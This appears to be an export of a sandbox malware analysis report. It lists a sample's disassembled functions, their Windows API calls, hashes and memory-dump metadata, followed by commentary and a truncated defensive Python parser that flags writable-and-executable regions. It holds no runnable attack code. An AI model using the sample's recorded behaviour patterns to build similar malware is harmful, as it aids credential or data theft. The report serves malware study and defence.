                                    • Part of subcall function 002D781C: __mtinitlocknum.LIBCMT ref: 002D7832
                                    • Part of subcall function 002D781C: __amsg_exit.LIBCMT ref: 002D783E
                                  • ___addlocaleref.LIBCMT ref: 002D8756
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                  • String ID: KERNEL32.DLL$Xu.$xt.
                                  • API String ID: 3105635775-476109047
                                  • Opcode ID: 6f3b06ea1b82aaa5b459e14c10f41584a56bb21a9207bfd31c010424be546ffb
                                  • Instruction ID: c4ed9c98eba6acc30340eda3bf4c06fdab5326f90bf33ea3f7b547751ee77923
                                  • Opcode Fuzzy Hash: 6f3b06ea1b82aaa5b459e14c10f41584a56bb21a9207bfd31c010424be546ffb
                                  • Instruction Fuzzy Hash: 6001AD71494B009AE720AF79D80A70AFBE0AF40310F20890FA4D5973E1CBB4AE14DF10
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002CE544
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE573
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CE581
                                  • lstrcat.KERNEL32(?,011CD970), ref: 002CE59C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: a984612b925fa46829ade022d564417a18714e9dc540ec4121e088b36d625e53
                                  • Instruction ID: e68e68523851d28bddbeb9d798aea5b7b3d27cd576d873281a32e8b5fc3c7bd5
                                  • Opcode Fuzzy Hash: a984612b925fa46829ade022d564417a18714e9dc540ec4121e088b36d625e53
                                  • Instruction Fuzzy Hash: 2551A7B1920108AFDF54EF54DC82EEE337DEB88340F54456DB90A97242DE70AE548FA1
                                  APIs
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 002D1FDF, 002D1FF5, 002D20B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen
                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 39653677-4138519520
                                  • Opcode ID: 6f0f3d6bdee8f623e43a8d56e2007d031ae058052d5640c06acc834946709e7d
                                  • Instruction ID: 6937b6f148a16734e2db54e833fe3eded435ac4b17155d35e8693edc29c888c9
                                  • Opcode Fuzzy Hash: 6f0f3d6bdee8f623e43a8d56e2007d031ae058052d5640c06acc834946709e7d
                                  • Instruction Fuzzy Hash: 2E21223993028ACACB20AE36C4447DDF366EBA0763F844157C8180B781E2720D2ED796
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002CEBB4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CEBE3
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CEBF1
                                  • lstrcat.KERNEL32(?,011CE328), ref: 002CEC0C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 35a0ce2caf06cd3e07f2fec8f1eb3153b4a0b59aabc86db5858a5c1c3bd948c9
                                  • Instruction ID: a74502cb0907cc574d2e46507b0714d5de20f35e3bff2c62d4ca3169a8b62910
                                  • Opcode Fuzzy Hash: 35a0ce2caf06cd3e07f2fec8f1eb3153b4a0b59aabc86db5858a5c1c3bd948c9
                                  • Instruction Fuzzy Hash: D0319771920159DBCB61EF64DC45BED73B4BF48300F1044B9BA4AAB291DE709E548F94
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,002DA3D0,000000FF), ref: 002D2B8F
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 002D2B96
                                  • GetLocalTime.KERNEL32(?,?,00000000,002DA3D0,000000FF), ref: 002D2BA2
                                  • wsprintfA.USER32 ref: 002D2BCE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 4acc42a3c2dd94a03b945701b3b6eb45e187cad6e06460d137ca414ef05142fd
                                  • Instruction ID: 59b848c377dea944f872a07b8f103acc13a32ce2b06e36dead4675c2d9ca6976
                                  • Opcode Fuzzy Hash: 4acc42a3c2dd94a03b945701b3b6eb45e187cad6e06460d137ca414ef05142fd
                                  • Instruction Fuzzy Hash: 62014CB2904168ABCB149BC9DD85FBEB7BCFB4CB11F00021AFA05A6281E7785940C7B5
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000), ref: 002D4492
                                  • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 002D44AD
                                  • CloseHandle.KERNEL32(00000000), ref: 002D44B4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D44E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                  • String ID:
                                  • API String ID: 4028989146-0
                                  • Opcode ID: af1efd95c3d1095bea427bb02270570cb60ee159371e402ebe82ddea2fbf2641
                                  • Instruction ID: 26d837cffb501bbc4568568305b596ecf877207442d5bf8a365f616a9af38d42
                                  • Opcode Fuzzy Hash: af1efd95c3d1095bea427bb02270570cb60ee159371e402ebe82ddea2fbf2641
                                  • Instruction Fuzzy Hash: 4CF0FCB09116566BE720AF749C49BE6B7A8AF14304F0045B5FA89DB2C1DBB08DD48B94
                                  APIs
                                  • __getptd.LIBCMT ref: 002D8FDD
                                    • Part of subcall function 002D87FF: __amsg_exit.LIBCMT ref: 002D880F
                                  • __getptd.LIBCMT ref: 002D8FF4
                                  • __amsg_exit.LIBCMT ref: 002D9002
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 002D9026
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 09f161c43b6e3507a0af232dce956c2def1b9f91c89e7d8052bd27a764c1dfe0
                                  • Instruction ID: 122c986df5ff89b851b3dac4540887f84d557f5f050e478d2062f6c1947a2bd0
                                  • Opcode Fuzzy Hash: 09f161c43b6e3507a0af232dce956c2def1b9f91c89e7d8052bd27a764c1dfe0
                                  • Instruction Fuzzy Hash: 46F090329687109BDB60BB78A80BB5D73A1AF00721F64411BF444AA3D2EF685D60EE55
                                  APIs
                                  • lstrlen.KERNEL32(------,002B5BEB), ref: 002D731B
                                  • lstrcpy.KERNEL32(00000000), ref: 002D733F
                                  • lstrcat.KERNEL32(?,------), ref: 002D7349
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpylstrlen
                                  • String ID: ------
                                  • API String ID: 3050337572-882505780
                                  • Opcode ID: ddef37a16fff479e215de07e30e42622e7aa05096e6664b0b0fb646102e9e306
                                  • Instruction ID: 99f1f1117e8dd0e5893b12d28748e1c8bb036b83a2d16b03c8d7bde8af4d7f7f
                                  • Opcode Fuzzy Hash: ddef37a16fff479e215de07e30e42622e7aa05096e6664b0b0fb646102e9e306
                                  • Instruction Fuzzy Hash: 2BF015745207028FDB649F35D888926BAF8AF84704328886EA8DAC7315EA34D8408B10
                                  APIs
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1557
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1579
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B159B
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B15FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C3422
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C344B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C3471
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C3497
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: e8103a793ba7fed44e4ee5bb73affebb027dc9289d624302d1d042f750d91e38
                                  • Instruction ID: b938b4f5c6ae6300d3e874e2158c86092b4312fe16611be97305eb59d0586a47
                                  • Opcode Fuzzy Hash: e8103a793ba7fed44e4ee5bb73affebb027dc9289d624302d1d042f750d91e38
                                  • Instruction Fuzzy Hash: 8712FD70A212028FDB28CF19C554B25B7E5BF44718B29C6ADE809DB3A2D772DD52CF44
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002C7C94
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002C7CAF
                                    • Part of subcall function 002C7D40: std::_Xinvalid_argument.LIBCPMT ref: 002C7D58
                                    • Part of subcall function 002C7D40: std::_Xinvalid_argument.LIBCPMT ref: 002C7D76
                                    • Part of subcall function 002C7D40: std::_Xinvalid_argument.LIBCPMT ref: 002C7D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: string too long
                                  • API String ID: 909987262-2556327735
                                  • Opcode ID: 2a24f1743baee6cfb4ee219448e9710628ec179b3a09409051b928febd00ff2d
                                  • Instruction ID: 700a71e67ebb86ef8af4f703eaa4ac5c4bd5f7984295e037e27adb6ac5090297
                                  • Opcode Fuzzy Hash: 2a24f1743baee6cfb4ee219448e9710628ec179b3a09409051b928febd00ff2d
                                  • Instruction Fuzzy Hash: 273109723282128BD724DD6CE880F6AF7E9EF91750B20472FF446CB641C7719D608BA4
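The "Memory Dump Source" blocks that accompany every function above are worth reading, not just scrolling past: the region the disassembly was taken from (base 0x2B1000, "based on PE: true") and most of its associated dumps carry protection value 0x40, which is PAGE_EXECUTE_READWRITE. Writable-and-executable image memory is what the "Detected unpacking (changes PE section rights)" and "self modifying code" signatures in the overview are pointing at. The following is an added example, not Joe Sandbox's own code or part of this report: a small parser that pulls the .sdmp names out of a pasted "Memory Dump Source" block and flags every region that is both writable and executable. It assumes, based only on how the values in this listing line up with the Windows PAGE_* constants, that the fourth dot-separated field of the dump name is the region base address and the fifth is the page protection; the other fields are treated as opaque. The sample text is copied from the listing above, trimmed to five lines, and the regex tolerates the "Download File" link residue that the HTML export leaves on each line.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: five lines in the shape of the report's "Memory Dump Source" block.
SAMPLE_LISTING = """\
• Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
"""

# Windows memory protection constants (winnt.h). Low byte is the base protection,
# bits 0x100/0x200/0x400 are modifiers that can be OR'ed onto it.
PAGE_BASE = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# Base protections that grant both write and execute on the same pages.
WRITE_AND_EXEC = {0x40, 0x80}

# Eight dot-separated hex fields followed by ".sdmp"; searched, not anchored, so
# trailing link residue such as "Download File" does not break the match.
DUMP_NAME_RE = re.compile(r"([0-9A-Fa-f]{8}(?:\.[0-9A-Fa-f]+){7})\.sdmp")


def parse_dump_name(name: str) -> Dict[str, object]:
    """Split an .sdmp file name into fields.

    Assumed layout (field index): 0 = process index, 1 = analysis stage,
    3 = region base address, 4 = page protection. Fields 2, 5, 6, 7 are kept raw.
    """
    stem = name[:-len(".sdmp")] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump name layout: {name}")
    return {
        "name": name,
        "process_index": int(fields[0], 16),
        "stage": int(fields[1], 16),
        "base": int(fields[3], 16),
        "protect": int(fields[4], 16),
        "raw_fields": fields,
    }


def describe_protect(value: int) -> str:
    """Render a protection value as PAGE_* names, e.g. 0x104 -> PAGE_READWRITE|PAGE_GUARD."""
    base = PAGE_BASE.get(value & 0xFF, f"UNKNOWN(0x{value & 0xFF:x})")
    mods = [name for bit, name in PAGE_MODIFIERS.items() if value & bit]
    return "|".join([base] + mods)


def parse_listing(text: str) -> List[Dict[str, object]]:
    """Extract every dump region from a pasted 'Memory Dump Source' block, in order."""
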